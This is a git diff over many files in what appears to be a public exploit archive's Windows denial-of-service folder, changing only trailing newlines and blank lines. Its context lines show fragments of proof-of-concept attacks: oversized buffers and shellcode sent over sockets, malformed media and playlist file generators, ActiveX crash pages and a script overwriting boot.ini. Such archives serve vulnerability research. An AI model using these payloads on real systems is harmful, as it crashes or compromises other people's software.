7a5b788a1..2fc13fa4c 100755 --- a/platforms/windows/dos/3119.py +++ b/platforms/windows/dos/3119.py @@ -48,4 +48,4 @@ fileOut = open('videolan.wmv','wb') fileOut.write(VLCFile) fileOut.close() -# milw0rm.com [2007-01-12] +# milw0rm.com [2007-01-12] \ No newline at end of file diff --git a/platforms/windows/dos/312.txt b/platforms/windows/dos/312.txt index 60f297a53..9b722bb93 100755 --- a/platforms/windows/dos/312.txt +++ b/platforms/windows/dos/312.txt @@ -33,4 +33,4 @@ http://www.geocities.com/visitbipin/ Disclaimer: The information in the advisory is believed to be accurate at the time of printing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage arising from use of, or reliance on this information. -# milw0rm.com [2004-07-12] +# milw0rm.com [2004-07-12] \ No newline at end of file diff --git a/platforms/windows/dos/31222.py b/platforms/windows/dos/31222.py index b91f5b39b..f0230f545 100755 --- a/platforms/windows/dos/31222.py +++ b/platforms/windows/dos/31222.py @@ -4127,4 +4127,4 @@ file.write(poc_file) file.close() print "\n[*] Oracle Outside In MDB File Parsing Stack Based Buffer Overflow PoC" -print "[*] CVE-2013-5791.MDB was created successfully!" +print "[*] CVE-2013-5791.MDB was created successfully!" \ No newline at end of file diff --git a/platforms/windows/dos/3126.c b/platforms/windows/dos/3126.c index 94712f914..bc936e223 100755 --- a/platforms/windows/dos/3126.c +++ b/platforms/windows/dos/3126.c @@ -95,4 +95,4 @@ int main(int argc, char* argv[]) return 0; } -// milw0rm.com [2007-01-14] +// milw0rm.com [2007-01-14] \ No newline at end of file diff --git a/platforms/windows/dos/3127.c b/platforms/windows/dos/3127.c index 309f3dfd6..d2484d3fa 100755 --- a/platforms/windows/dos/3127.c +++ b/platforms/windows/dos/3127.c @@ -83,4 +83,4 @@ int main(int argc, char* argv[]) return 0; } -// milw0rm.com [2007-01-14] +// milw0rm.com [2007-01-14] \ No newline at end of file diff --git a/platforms/windows/dos/3128.c b/platforms/windows/dos/3128.c index 498f0a6d1..6054e9665 100755 --- a/platforms/windows/dos/3128.c +++ b/platforms/windows/dos/3128.c @@ -77,4 +77,4 @@ int main(int argc, char* argv[]) return 0; } -// milw0rm.com [2007-01-14] +// milw0rm.com [2007-01-14] \ No newline at end of file diff --git a/platforms/windows/dos/31302.txt b/platforms/windows/dos/31302.txt index 661319b23..b4c7178ec 100755 --- a/platforms/windows/dos/31302.txt +++ b/platforms/windows/dos/31302.txt @@ -9,4 +9,4 @@ SurgeFTP 2.3a2 is vulnerable; other versions may also be affected. GET / HTTP/1.0 Content-Length: 2147483647 -boom +boom \ No newline at end of file diff --git a/platforms/windows/dos/31323.c b/platforms/windows/dos/31323.c index 8caab2c94..848f90271 100755 --- a/platforms/windows/dos/31323.c +++ b/platforms/windows/dos/31323.c @@ -115,4 +115,4 @@ printf("\n%s\n",rcv); printf("\nOK!\nYou're Livebox FTP server should fu**ed out..."); exit(0); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/3138.pl b/platforms/windows/dos/3138.pl index 9d13c9239..4e463ab8c 100755 --- a/platforms/windows/dos/3138.pl +++ b/platforms/windows/dos/3138.pl @@ -21,4 +21,4 @@ my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => # pretty close to the output of the c code. print $sock "GET" . "A" x 1049 . "\r\n"; -# milw0rm.com [2003-07-07] +# milw0rm.com [2003-07-07] \ No newline at end of file diff --git a/platforms/windows/dos/3142.html b/platforms/windows/dos/3142.html index d55f71d19..c21a8e969 100755 --- a/platforms/windows/dos/3142.html +++ b/platforms/windows/dos/3142.html @@ -24,4 +24,4 @@ CCRP.RootFolder = arg1 document.location.reload() </script> -# milw0rm.com [2007-01-17] +# milw0rm.com [2007-01-17] \ No newline at end of file diff --git a/platforms/windows/dos/3155.html b/platforms/windows/dos/3155.html index 4a9cf1aee..198b44711 100755 --- a/platforms/windows/dos/3155.html +++ b/platforms/windows/dos/3155.html @@ -22,4 +22,4 @@ CCRP_BDc.SelectedFolder = arg1 document.location.reload() </script> -# milw0rm.com [2007-01-18] +# milw0rm.com [2007-01-18] \ No newline at end of file diff --git a/platforms/windows/dos/3157.html b/platforms/windows/dos/3157.html index b68a7f9fa..68604cd21 100755 --- a/platforms/windows/dos/3157.html +++ b/platforms/windows/dos/3157.html @@ -22,4 +22,4 @@ url: http://www.divx.com/ DivXBrowserPlugin.GoWindowed() </script> -# milw0rm.com [2007-01-19] +# milw0rm.com [2007-01-19] \ No newline at end of file diff --git a/platforms/windows/dos/31585.c b/platforms/windows/dos/31585.c index 5cbb21bdc..753b5adfb 100755 --- a/platforms/windows/dos/31585.c +++ b/platforms/windows/dos/31585.c @@ -19,4 +19,4 @@ int main(int argc,char *argv[]) SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress ); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/31607.py b/platforms/windows/dos/31607.py index 8b6ad51cd..a04c74c21 100755 --- a/platforms/windows/dos/31607.py +++ b/platforms/windows/dos/31607.py @@ -66,6 +66,4 @@ except error,e: print "[+] The attack took %d secs" % int(time.time() - timestart) else: print "[-] Attack was not successful!" - s.close() - - + s.close() \ No newline at end of file diff --git a/platforms/windows/dos/31635.py b/platforms/windows/dos/31635.py index e7c9c5ca3..4479a7007 100755 --- a/platforms/windows/dos/31635.py +++ b/platforms/windows/dos/31635.py @@ -78,4 +78,4 @@ except error,e: print "[+] The attack was successful!" else: print "[-] Attack was not successful!" - s.close() + s.close() \ No newline at end of file diff --git a/platforms/windows/dos/31711.html b/platforms/windows/dos/31711.html index a7f083aae..58c5ea681 100755 --- a/platforms/windows/dos/31711.html +++ b/platforms/windows/dos/31711.html @@ -8,4 +8,4 @@ Microsoft Excel 2007 is vulnerable; other versions may also be affected. <html> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('Yacubian')></OBJECT> -<img> +<img> \ No newline at end of file diff --git a/platforms/windows/dos/31762.py b/platforms/windows/dos/31762.py index 92d3fee04..945096ad9 100755 --- a/platforms/windows/dos/31762.py +++ b/platforms/windows/dos/31762.py @@ -116,5 +116,4 @@ s.send(struct.pack('>I',len(buff) )) s.send(buff) buff= "\x02\x00\x00\x00" + RetAdd*3 + "\x00\x00\x00\x00" * 13 + "\x00\x00\x00\x00" * 5 + "CATV5_AllApplications" +"\x00" + "\x00"* 43 +"\x00\x00\x98" + "\x00\x00\x00\x01" +"\x00"*4 +"\x08\x00\x00\x00" + Shell s.send(struct.pack('>I',len(buff) )) -s.send(buff) - +s.send(buff) \ No newline at end of file diff --git a/platforms/windows/dos/31763.py b/platforms/windows/dos/31763.py index 3fdffaf2b..220070be3 100755 --- a/platforms/windows/dos/31763.py +++ b/platforms/windows/dos/31763.py @@ -64,6 +64,4 @@ buff="\xD1\x07\x00\x00" + "\x1C\x08\x00\x00" + Shell + EIP + "\x90\x90\x90\x90\x #OpCode Size of the next data Junk s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.3", 30000)) -s.send(buff) - - +s.send(buff) \ No newline at end of file diff --git a/platforms/windows/dos/31791.py b/platforms/windows/dos/31791.py index 109533202..7ae3a843d 100755 --- a/platforms/windows/dos/31791.py +++ b/platforms/windows/dos/31791.py @@ -98,4 +98,4 @@ buff= "\x00\x00\x00\x00" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "A" * 48 + "CA s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.4", 55555)) s.send(struct.pack('>I',len(buff) )) -s.send(buff) +s.send(buff) \ No newline at end of file diff --git a/platforms/windows/dos/31818.sh b/platforms/windows/dos/31818.sh index 0532bf7c1..a5d4433b8 100755 --- a/platforms/windows/dos/31818.sh +++ b/platforms/windows/dos/31818.sh @@ -18,4 +18,4 @@ while [ 1 ]; do echo CWD pub echo CWD .. done -EOF +EOF \ No newline at end of file diff --git a/platforms/windows/dos/31819.pl b/platforms/windows/dos/31819.pl index ce3aa07c7..e94c67895 100755 --- a/platforms/windows/dos/31819.pl +++ b/platforms/windows/dos/31819.pl @@ -37,5 +37,4 @@ while(1) $ftp -> cwd(); } -$ftp->quit; - +$ftp->quit; \ No newline at end of file diff --git a/platforms/windows/dos/3182.py b/platforms/windows/dos/3182.py index cfa937ae5..d5dfc0b6a 100755 --- a/platforms/windows/dos/3182.py +++ b/platforms/windows/dos/3182.py @@ -32,4 +32,4 @@ try: except: print "Unable to connect. exiting." -# milw0rm.com [2007-01-23] +# milw0rm.com [2007-01-23] \ No newline at end of file diff --git a/platforms/windows/dos/31856.html b/platforms/windows/dos/31856.html index a2198c8ed..01c62d6bb 100755 --- a/platforms/windows/dos/31856.html +++ b/platforms/windows/dos/31856.html @@ -21,6 +21,4 @@ id='UmxEventCliLib'/> </object><script language='vbscript'> filePath="..\..\..\..\..\..\..\boot.ini" UmxEventCliLib.SaveToFile filePath -</script></html> - - +</script></html> \ No newline at end of file diff --git a/platforms/windows/dos/3190.py b/platforms/windows/dos/3190.py index d1605d0d8..15a019c03 100755 --- a/platforms/windows/dos/3190.py +++ b/platforms/windows/dos/3190.py @@ -11,4 +11,4 @@ fileOut = open('die.avi','wb') fileOut.write('\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00') fileOut.close() -# milw0rm.com [2007-01-24] +# milw0rm.com [2007-01-24] \ No newline at end of file diff --git a/platforms/windows/dos/3193.py b/platforms/windows/dos/3193.py index df21397dd..cafb08312 100755 --- a/platforms/windows/dos/3193.py +++ b/platforms/windows/dos/3193.py @@ -98,4 +98,4 @@ if __name__ == "__main__": CreateXLS() ModifyXLS() -# milw0rm.com [2007-01-25] +# milw0rm.com [2007-01-25] \ No newline at end of file diff --git a/platforms/windows/dos/3204.c b/platforms/windows/dos/3204.c index f0aefd345..c30025184 100755 --- a/platforms/windows/dos/3204.c +++ b/platforms/windows/dos/3204.c @@ -176,4 +176,4 @@ int main ( int argc, char *argv[] ) return(0); } -// milw0rm.com [2007-01-26] +// milw0rm.com [2007-01-26] \ No newline at end of file diff --git a/platforms/windows/dos/32054.py b/platforms/windows/dos/32054.py index 908f05f31..8ac4b4771 100755 --- a/platforms/windows/dos/32054.py +++ b/platforms/windows/dos/32054.py @@ -54,4 +54,4 @@ pcast += '.xml"/></link>\n</channel>\n</pcast>\n' f = open('evil.pcast','wb') f.write(pcast); -f.close +f.close \ No newline at end of file diff --git a/platforms/windows/dos/32056.py b/platforms/windows/dos/32056.py index 19cd79323..ebc59eb51 100755 --- a/platforms/windows/dos/32056.py +++ b/platforms/windows/dos/32056.py @@ -36,4 +36,4 @@ batch += badstr f = open('evil_batch.txt','wb') f.write(batch); -f.close +f.close \ No newline at end of file diff --git a/platforms/windows/dos/32105.pl b/platforms/windows/dos/32105.pl index 18775127f..04f6d8075 100755 --- a/platforms/windows/dos/32105.pl +++ b/platforms/windows/dos/32105.pl @@ -22,4 +22,4 @@ print m3u "$buffer"; print "\n--> Evil Playlist created... Have fun!\n"; -# July, 2008 +# July, 2008 \ No newline at end of file diff --git a/platforms/windows/dos/3224.c b/platforms/windows/dos/3224.c index 1dd4fac27..03702b6c3 100755 --- a/platforms/windows/dos/3224.c +++ b/platforms/windows/dos/3224.c @@ -94,4 +94,4 @@ int main() { return 0; } -// milw0rm.com [2007-01-29] +// milw0rm.com [2007-01-29] \ No newline at end of file diff --git a/platforms/windows/dos/32256.py b/platforms/windows/dos/32256.py index 241be25aa..2ee04dccc 100755 --- a/platforms/windows/dos/32256.py +++ b/platforms/windows/dos/32256.py @@ -44,4 +44,4 @@ print NEW_SOCKET $goodz; close NEW_SOCKET; } -# Anyways, in the WS_FTP Home client there's still a buffer overflow in the FTP server message response ( 4100 chars answer --> done ). +# Anyways, in the WS_FTP Home client there's still a buffer overflow in the FTP server message response ( 4100 chars answer --> done ). \ No newline at end of file diff --git a/platforms/windows/dos/3229.py b/platforms/windows/dos/3229.py index f9187188f..6a02ed2db 100755 --- a/platforms/windows/dos/3229.py +++ b/platforms/windows/dos/3229.py @@ -42,4 +42,4 @@ better" except: print "Unable to create file!" -# milw0rm.com [2007-01-30] +# milw0rm.com [2007-01-30] \ No newline at end of file diff --git a/platforms/windows/dos/32356.txt b/platforms/windows/dos/32356.txt index 2a67e8035..444d24382 100755 --- a/platforms/windows/dos/32356.txt +++ b/platforms/windows/dos/32356.txt @@ -16,5 +16,4 @@ HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 string2: ASCII: ???????????AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA????AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 - +HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 \ No newline at end of file diff --git a/platforms/windows/dos/324.txt b/platforms/windows/dos/324.txt index 6aca2a0eb..f54556627 100755 --- a/platforms/windows/dos/324.txt +++ b/platforms/windows/dos/324.txt @@ -1,3 +1,3 @@ ping -l 65510 your.host.ip.address -# milw0rm.com [1996-10-21] +# milw0rm.com [1996-10-21] \ No newline at end of file diff --git a/platforms/windows/dos/32420.c b/platforms/windows/dos/32420.c index c74539fb7..ac612ef88 100755 --- a/platforms/windows/dos/32420.c +++ b/platforms/windows/dos/32420.c @@ -160,4 +160,4 @@ for(i=0;i<12;i++) nops1[i]='\x90'; fclose(f); printf("Ciph3r.exe created!\n"); return EXIT_SUCCESS; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/32428.txt b/platforms/windows/dos/32428.txt index 8f1931da9..71dbe2125 100755 --- a/platforms/windows/dos/32428.txt +++ b/platforms/windows/dos/32428.txt @@ -122,5 +122,4 @@ VtLqYvqps+RqHsc561oFgzJdIkNrV9SAN3dvG6UCpRHU0rvWWejXktWJyUnEJQOm y6N5buuTY8iEZO7qQaVOX1TCpXPy5Up2VVOy2N5e/NfP9SIuUgkW7bjSxFHyZdM1 ysPSsB6mj4NrYXL0CoNT6GSuJL8CCnf87NkTcBPbItco7t2zjI0Yp3Eh9IiQbknO W8FiRkXuqXS91d7OyjFWzl2blDkMfN1N/ich/l81RPLlEdysZyZSym13LJ/K+NJe -0mUj+/UJr5crMjh/Kw7pva/6QMQ9ewBABwA= - +0mUj+/UJr5crMjh/Kw7pva/6QMQ9ewBABwA= \ No newline at end of file diff --git a/platforms/windows/dos/3248.rb b/platforms/windows/dos/3248.rb index f36c44584..1feff4050 100755 --- a/platforms/windows/dos/3248.rb +++ b/platforms/windows/dos/3248.rb @@ -61,4 +61,4 @@ else puts "[+]Done...\n[+]Catirpc.exe is dead\n[+]... or it will die in a few seconds for you inpatient bastards\n" end -# milw0rm.com [2007-02-01] +# milw0rm.com [2007-02-01] \ No newline at end of file diff --git a/platforms/windows/dos/32522.py b/platforms/windows/dos/32522.py index a8b2f5bc2..516aabc58 100755 --- a/platforms/windows/dos/32522.py +++ b/platforms/windows/dos/32522.py @@ -34,4 +34,4 @@ pay = shellcode pay = pay.rjust(520, "\x90") pay += "\x9c\xdb\x12" -os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + pay + "\"") +os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + pay + "\"") \ No newline at end of file diff --git a/platforms/windows/dos/3254.py b/platforms/windows/dos/3254.py index 3afb7b5b2..2ca921969 100755 --- a/platforms/windows/dos/3254.py +++ b/platforms/windows/dos/3254.py @@ -37,4 +37,4 @@ try: print "than me can succesfully exploit it :P\n" except: print "Unable to create file!" -# milw0rm.com [2007-02-02] +# milw0rm.com [2007-02-02] \ No newline at end of file diff --git a/platforms/windows/dos/32657.py b/platforms/windows/dos/32657.py index 4aafe1ec6..3ab73b659 100755 --- a/platforms/windows/dos/32657.py +++ b/platforms/windows/dos/32657.py @@ -47,4 +47,4 @@ if con_recv[0]=='\xa0': except: print "Failed to receive response: ", sys.exc_info()[0] - sock.close() + sock.close() \ No newline at end of file diff --git a/platforms/windows/dos/32688.py b/platforms/windows/dos/32688.py index 4d8a38594..3b48d12c0 100755 --- a/platforms/windows/dos/32688.py +++ b/platforms/windows/dos/32688.py @@ -63,4 +63,4 @@ headers = open(txt_title + ext, "w") headers.write(txt_header) headers.close() print "\nFile created successfully !"; -print "\n\cN4phux."; +print "\n\cN4phux."; \ No newline at end of file diff --git a/platforms/windows/dos/32704.pl b/platforms/windows/dos/32704.pl index 452b411cc..20a0865d0 100755 --- a/platforms/windows/dos/32704.pl +++ b/platforms/windows/dos/32704.pl @@ -85,4 +85,4 @@ fn main() { let mut socket = TcpStream::connect(addr).unwrap(); socket.write(bytes!("\x74\x30\x30\x74\x21")); println!("[*] Crashed!\n"); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/32707.txt b/platforms/windows/dos/32707.txt index 0621951fb..7a998efb5 100755 --- a/platforms/windows/dos/32707.txt +++ b/platforms/windows/dos/32707.txt @@ -39,4 +39,4 @@ efl=00010246 for C:\Program Files\InfraRecorder\infrarecorder.exe #infrarecorder+ba5b0 (004ba5b0) #0012d07c: infrarecorder+10041 (00410041) -#Invalid exception stack at 00410041 +#Invalid exception stack at 00410041 \ No newline at end of file diff --git a/platforms/windows/dos/3272.html b/platforms/windows/dos/3272.html index 0f8d27ce0..b3ea80ee4 100755 --- a/platforms/windows/dos/3272.html +++ b/platforms/windows/dos/3272.html @@ -37,4 +37,4 @@ for(var key in data); </body> </html> -# milw0rm.com [2007-02-05] +# milw0rm.com [2007-02-05] \ No newline at end of file diff --git a/platforms/windows/dos/32755.c b/platforms/windows/dos/32755.c index 36a360979..ef1abd860 100755 --- a/platforms/windows/dos/32755.c +++ b/platforms/windows/dos/32755.c @@ -162,4 +162,4 @@ void header() printf("\tWFTPD Pro Server 3.30.0.1 (pre auth) Remote Denial of Service Exploit\n"); printf("\t\t\tby LiquidWorm <liquidworm [t00t] gmail [w00t ] com>\n\n"); printf("--------------------------------------------------------------------------------\n\n"); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/3276.cpp b/platforms/windows/dos/3276.cpp index 956ee189b..61644f3e7 100755 --- a/platforms/windows/dos/3276.cpp +++ b/platforms/windows/dos/3276.cpp @@ -114,4 +114,4 @@ int main(int argc, char* argv[]) return 0; } -// milw0rm.com [2007-02-06] +// milw0rm.com [2007-02-06] \ No newline at end of file diff --git a/platforms/windows/dos/3277.cpp b/platforms/windows/dos/3277.cpp index c3ddcbc11..e2aab80a9 100755 --- a/platforms/windows/dos/3277.cpp +++ b/platforms/windows/dos/3277.cpp @@ -64,4 +64,4 @@ int main(int argc, char* argv[]) return 0; } -// milw0rm.com [2007-02-06] +// milw0rm.com [2007-02-06] \ No newline at end of file diff --git a/platforms/windows/dos/32772.py b/platforms/windows/dos/32772.py index 417f0883f..cf28b88cb 100755 --- a/platforms/windows/dos/32772.py +++ b/platforms/windows/dos/32772.py @@ -37,4 +37,4 @@ ce=buf f=open(file_name,'w') f.write(ce) f.close() -print 'PoC created!' +print 'PoC created!' \ No newline at end of file diff --git a/platforms/windows/dos/32824.pl b/platforms/windows/dos/32824.pl index 7db4cf95d..00afdefe6 100755 --- a/platforms/windows/dos/32824.pl +++ b/platforms/windows/dos/32824.pl @@ -23,4 +23,4 @@ print file $lng; print file "\n"; print file $packet; close(file); -print "File has created!\n"; +print "File has created!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/32881.py b/platforms/windows/dos/32881.py index 66ceb7f2a..d6f4e7f50 100755 --- a/platforms/windows/dos/32881.py +++ b/platforms/windows/dos/32881.py @@ -184,4 +184,4 @@ my $fun = $S.$M.$I.$L.$E; open (mrowdiuqil, ">./$file") || die "\nMffff... $!\n"; print mrowdiuqil "$fun"; close (mrowdiuqil); -print "\n[+] File $file created with funny potion\!\n\n"; +print "\n[+] File $file created with funny potion\!\n\n"; \ No newline at end of file diff --git a/platforms/windows/dos/32899.py b/platforms/windows/dos/32899.py index a1321375e..c33ed7452 100755 --- a/platforms/windows/dos/32899.py +++ b/platforms/windows/dos/32899.py @@ -43,5 +43,4 @@ file = open(filename, "w") zipfile = buffer + payload + cdf + payload + eo file.write(zipfile) -file.close() - +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/329.txt b/platforms/windows/dos/329.txt index c569bdc3d..0dccf169f 100755 --- a/platforms/windows/dos/329.txt +++ b/platforms/windows/dos/329.txt @@ -1,3 +1,3 @@ You can crash an NT box (possibly W95 too) by sending a very long username in a Winpopup message. This is easy to do from UNIX with 'smbclient -U LOTSandLOTSofcrap -M host'. -# milw0rm.com [1997-04-01] +# milw0rm.com [1997-04-01] \ No newline at end of file diff --git a/platforms/windows/dos/32902.py b/platforms/windows/dos/32902.py index 9793a321d..6b55cc3fd 100755 --- a/platforms/windows/dos/32902.py +++ b/platforms/windows/dos/32902.py @@ -26,4 +26,4 @@ def send_file(): sys.stdout.write(random.choice(CHAR_SET)) sys.exit() -send_file() +send_file() \ No newline at end of file diff --git a/platforms/windows/dos/32956.py b/platforms/windows/dos/32956.py index fa1ff2389..7bd2c4c7f 100755 --- a/platforms/windows/dos/32956.py +++ b/platforms/windows/dos/32956.py @@ -29,5 +29,4 @@ f.close() except IOError: pass -print "[x] Try loading foo.mp3" - +print "[x] Try loading foo.mp3" \ No newline at end of file diff --git a/platforms/windows/dos/33018.txt b/platforms/windows/dos/33018.txt index 99e08c5a7..688b7f470 100755 --- a/platforms/windows/dos/33018.txt +++ b/platforms/windows/dos/33018.txt @@ -160,4 +160,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5184.php s_string("joxypoxyjoxypoxy!!\r\n\" * 100); s_string_variable("ZSL"); s_string("\r\n"); //importante - s_block_end("fuzz"); + s_block_end("fuzz"); \ No newline at end of file diff --git a/platforms/windows/dos/3304.py b/platforms/windows/dos/3304.py index 46ce3281a..cdadc29ab 100755 --- a/platforms/windows/dos/3304.py +++ b/platforms/windows/dos/3304.py @@ -26,4 +26,4 @@ try: except: print "Unable to connect. exiting." -# milw0rm.com [2007-02-13] +# milw0rm.com [2007-02-13] \ No newline at end of file diff --git a/platforms/windows/dos/33056.pl b/platforms/windows/dos/33056.pl index 2c3401ba1..a6fcd5f9b 100755 --- a/platforms/windows/dos/33056.pl +++ b/platforms/windows/dos/33056.pl @@ -121,4 +121,4 @@ send_request($h, # URL parameters ); -print "[*] Done\n"; +print "[*] Done\n"; \ No newline at end of file diff --git a/platforms/windows/dos/33059.smpl b/platforms/windows/dos/33059.smpl index 91229913c..70b791535 100755 --- a/platforms/windows/dos/33059.smpl +++ b/platforms/windows/dos/33059.smpl @@ -10,4 +10,4 @@ Storm 3.09.62 is vulnerable; other versions may also be affected. Settings\Linlin\����\2.GIF" duration="0"/><item name="0001.gif" source="C:\Documents and Settings\Linlin\����\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif" -duration="0"/></playlist> +duration="0"/></playlist> \ No newline at end of file diff --git a/platforms/windows/dos/3306.pl b/platforms/windows/dos/3306.pl index 8409808b0..f7ae56686 100755 --- a/platforms/windows/dos/3306.pl +++ b/platforms/windows/dos/3306.pl @@ -76,4 +76,4 @@ sub connect_host { return(1338); } -# milw0rm.com [2007-02-14] +# milw0rm.com [2007-02-14] \ No newline at end of file diff --git a/platforms/windows/dos/3307.html b/platforms/windows/dos/3307.html index 3a7dbc920..d948f70d2 100755 --- a/platforms/windows/dos/3307.html +++ b/platforms/windows/dos/3307.html @@ -83,4 +83,4 @@ End Sub <br> ---------------------------------------------------------------- <br>To be continued...</font> -# milw0rm.com [2007-02-14] +# milw0rm.com [2007-02-14] \ No newline at end of file diff --git a/platforms/windows/dos/3308.pl b/platforms/windows/dos/3308.pl index 892eeb79a..c445db346 100755 --- a/platforms/windows/dos/3308.pl +++ b/platforms/windows/dos/3308.pl @@ -71,4 +71,4 @@ sub connect_host { return(1338); } -# milw0rm.com [2007-02-14] +# milw0rm.com [2007-02-14] \ No newline at end of file diff --git a/platforms/windows/dos/33175.txt b/platforms/windows/dos/33175.txt index c0da8e8e5..e05cb0e62 100755 --- a/platforms/windows/dos/33175.txt +++ b/platforms/windows/dos/33175.txt @@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting Versions prior to Internet Explorer 8 beta 2 are vulnerable. -document.createElement('li').setattribute('value', 'KillIE7'); +document.createElement('li').setattribute('value', 'KillIE7'); \ No newline at end of file diff --git a/platforms/windows/dos/33205.pl b/platforms/windows/dos/33205.pl index 8a2dbd73d..d7a3bee1a 100755 --- a/platforms/windows/dos/33205.pl +++ b/platforms/windows/dos/33205.pl @@ -22,5 +22,4 @@ http://nds1.nokia.com/phones/files/software/nokia_multimedia_player_en.exe my $junk="A"x 4; open(MYFILE,'>>nokia.npl'); print MYFILE $junk; -close(MYFILE); - +close(MYFILE); \ No newline at end of file diff --git a/platforms/windows/dos/33220.txt b/platforms/windows/dos/33220.txt index eac82b952..90c38dfa6 100755 --- a/platforms/windows/dos/33220.txt +++ b/platforms/windows/dos/33220.txt @@ -2218,4 +2218,4 @@ RECV: 200 NOOP command successful [ Connecting to 192.168.253.134:21... ] [ Connected, starting fuzz process... ] [ CMD: [NOOP] FUZZ: [A`/A`/A`/A`/A`/A`/A`] SIZE: 700 ] -[ Connecting to 192.168.253.134:21... ] +[ Connecting to 192.168.253.134:21... ] \ No newline at end of file diff --git a/platforms/windows/dos/33221.html b/platforms/windows/dos/33221.html index c66d93ddd..5ac4399f0 100755 --- a/platforms/windows/dos/33221.html +++ b/platforms/windows/dos/33221.html @@ -24,4 +24,4 @@ AAAAAAAAAAAAAAAAAA" GWComposeCtl.SetFontFace arg1 -</script> +</script> \ No newline at end of file diff --git a/platforms/windows/dos/33271.py b/platforms/windows/dos/33271.py index 1cf402192..8889fcb42 100755 --- a/platforms/windows/dos/33271.py +++ b/platforms/windows/dos/33271.py @@ -49,4 +49,4 @@ try: except: print "\nExploit completed..." except: - print "Something goes wrong honey..." + 